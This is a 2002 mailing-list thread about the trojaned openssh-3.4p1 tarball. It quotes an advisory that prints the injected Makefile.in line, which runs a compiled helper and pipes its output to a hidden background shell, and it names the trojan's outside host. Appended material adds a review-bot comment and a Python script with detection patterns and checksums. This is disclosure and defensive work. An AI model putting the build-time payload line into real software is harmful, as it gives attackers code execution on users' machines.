
11863 Re: [LINUX_Newbies] openssh-3.4p1.tar.gz distribution recently trojaned

  • Horror Vacui
    Aug 1, 2002
      Mohsin Khan wrote:

      >I thought that Linux had no viruses?
      >

      Yes, you thought so and have all the right in the world to continue
      doing it. A trojan is not a virus. Viruses are snippets of programming
      code that can perform tasks like deleting or infecting files, formatting
      disks, sending mail, perhaps most importantly spread themselves... A
      trojan is just malicious code in a program that gathers information
      it's programmed to gather, and sends it to somebody. It's a way for
      crackers to sneak into your system and get access to information they
      can't get from the outside. This one appears to be quite serious,
      because you often use ssh as root - therefore the trojan can access and
      betray any information root has access to, and that means quite anything.

      Nobody ever said that Open Source is impossible to crack. People will
      always try, and some will succeed. The difference between Open Source
      and proprietary software though, the significant difference that makes
      Open Source more secure, is the way such things are handled. Right at
      the moment, any piece of Open Source software you're using is being
      hacked by hundreds of friendly geeks trying to make it better for you,
      and if some unfriendly geek puts something into it to damage you, the
      friendly ones are very likely to notice right away, and being friendly,
      they invariably yell "FIRE" the moment they smell the smoke even if
      they're ashamed because of it. Proprietary software is controlled by
      far fewer people, some of them on starving wages, much less enthusiastic
      and much less likely to find a vulnerability. When they do, the company
      they work for is very unlikely to say "We've sold you malicious code,
      have a patch right away" - it's bad for the business. Hence the
      institution of Microsoft Service Packs, mending the worse failings and
      covering up others without you being informed explicitly what it does
      (naming the flaw). They sell it off as a service to make customers'
      software better, instead of admitting they made a mistake and are just
      correcting it.

      My thanks to friendly geeks for the software, and for having the
      greatness to admit it when they mess up. Never mind, shit happens.


      Cheers
      Horror Vacui

      >
      >
      >
      >
      >>-----Original Message-----
      >>From: Godwin Stewart [mailto:gstewart@...]
      >>Sent: Thursday, August 01, 2002 2:41 PM
      >>To: Beginning With Linux; Linux list; Linux Newbies; Linux-Anyway
      >>Subject: [LINUX_Newbies] openssh-3.4p1.tar.gz distribution recently
      >>trojaned
      >>
      >>X-POSTED to:
      >>
      >>BeginningWithLinux@yahoogroups.com
      >>linux@yahoogroups.com
      >>LINUX_Newbies@yahoogroups.com
      >>Linux-Anyway@...
      >>
      >>
      >>
      >>From
      >>http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
      >>
      >>----- Forwarded message from Edwin Groothuis <edwin@...> -----
      >>
      >>Date: Thu, 1 Aug 2002 16:55:51 +1000
      >>From: Edwin Groothuis <edwin@...>
      >>To: incidents@...
      >>Subject: openssh-3.4p1.tar.gz trojaned
      >>
      >>Greetings,
      >>
      >>Just want to inform you that the OpenSSH package on ftp.openbsd.org
      >>(and probably all its mirrors now) is trojaned:
      >>
      >> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
      >>
      >>The OpenBSD people have been informed about it (via email to
      >>deraadt@... and via irc.openprojects.org/#openbsd)
      >>
      >>
      >>The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
      >> all: libopenbsd-compat.a
      >>+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
      >>../bf-test.out &
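      Review bot: the added recipe line under `all:` has nothing to do with producing libopenbsd-compat.a and should be rejected. It compiles bf-test.c, runs the result and passes its output to `sh ../bf-test.out &`, so code executes at build time with the privileges of whoever runs make. The leading `@` keeps make from echoing the command and the trailing `&` detaches it, so nothing shows in the build output; a recipe for a library target should only build that target.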
      >>
      >>bf-test.c[1] is nothing more than a wrapper which generates a
      >>shell-script[2] which compiles itself and tries to connect to a
      >>server running on 203.62.158.32:6667 (web.snsonline.net).
      >>
      >>[1] http://www.mavetju.org/~edwin/bf-test.c
      >>[2] http://www.mavetju.org/~edwin/bf-output.sh
      >>
      >>This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
      >>ports system:
      >> MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
      >>
      >>This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
      >> MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
      >>
      >>--
      >>Seen in the classified ads:
      >>NICE PARACHUTE: NEVER OPENED - USED ONCE
      >> ____________________________________________
      >>| G. Stewart -- gstewart@... |
      >>| gstewart@... |
      >>|--------------------------------------------|
      >>| Linux User Group de Touraine |
      >>| http://www.lug-touraine.org |
      >> ____________________________________________
      >>
      >>------------------------ Yahoo! Groups Sponsor
      >>
      >>To unsubscribe from this list, please email LINUX_Newbies-
      >>unsubscribe@yahoogroups.com & you will be removed.
      >>
      >>Your use of Yahoo! Groups is subject to
      >>
      >>
      >http://docs.yahoo.com/info/terms/
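One way to triage a downloaded source tarball against the two digests and the Makefile.in change reported in the forwarded advisory, as an added example that is not part of the original posts. The heuristics, the function names and the constructed sample tarball are assumptions of this example.

```python
import hashlib, io, re, tarfile

# MD5 digests exactly as quoted in the advisory above. MD5 is used only because
# that is what was published; it identifies these two files, nothing more.
KNOWN_MD5 = {"459c1d0262e939d6432f193c7a4ba8a8": "known-good (FreeBSD ports)",
             "3ac9bc346d736b4a51d676faa2a08a57": "trojaned"}

# Heuristics chosen for this example (assumptions, not a complete detector).
CHECKS = [("runs a binary from the build dir", re.compile(r"(^|[;&|])\s*\./[\w.-]+")),
          ("feeds a file to a shell", re.compile(r"\b(?:sh|bash)\s+[\w./-]+")),
          ("backgrounds the job", re.compile(r"(?<!&)&\s*$"))]

def classify(data: bytes) -> str:
    """Map a tarball's MD5 to the advisory's verdict, or 'unknown'."""
    return KNOWN_MD5.get(hashlib.md5(data).hexdigest(), "unknown")

def scan_makefiles(data: bytes):
    """List (member, line_no, reasons) for suspicious recipe lines.
    Members are read from memory; nothing is extracted or executed."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar:
            if not member.isfile() or not member.name.rsplit("/", 1)[-1].startswith("Makefile"):
                continue
            text = tar.extractfile(member).read().decode("latin-1")
            for no, line in enumerate(text.splitlines(), 1):
                if not line.startswith("\t"):      # make recipe lines begin with a TAB
                    continue
                cmd = line.strip().lstrip("@-+ ")   # drop make's @ - + prefixes
                reasons = [why for why, rx in CHECKS if rx.search(cmd)]
                if reasons:
                    findings.append((member.name, no, reasons))
    return findings

def build_sample() -> bytes:
    """Constructed tarball: one Makefile.in carrying the added line from the advisory
    (re-joined where the e-mail wrapped it) plus one ordinary recipe line."""
    body = (b"all: libopenbsd-compat.a\n"
            b"\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ../bf-test.out &\n"
            b"libopenbsd-compat.a: $(OBJS)\n"
            b"\t$(AR) rv $@ $(OBJS)\n")
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("openssh-3.4p1/openbsd-compat/Makefile.in")
        info.size = len(body)
        tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()

if __name__ == "__main__":
    sample = build_sample()
    print(classify(sample), scan_makefiles(sample))
```

A digest that matches neither published value comes back as "unknown", which means the file has not been identified, not that it is clean.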